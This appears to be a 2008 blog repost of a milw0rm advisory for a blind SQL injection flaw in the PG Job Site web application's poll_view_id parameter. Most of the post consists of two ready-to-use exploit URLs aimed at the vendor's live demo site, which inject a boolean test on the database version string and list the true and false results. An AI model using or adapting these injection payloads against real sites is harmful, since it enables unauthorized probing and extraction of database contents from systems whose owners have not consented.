PG Job Site (poll_view_id) Blind SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7202
Discovered By: ZoRLu
exploit for demo: ( you must login to site after you test this links. you look left for two link)
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
23 Kasım 2008 Pazar
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder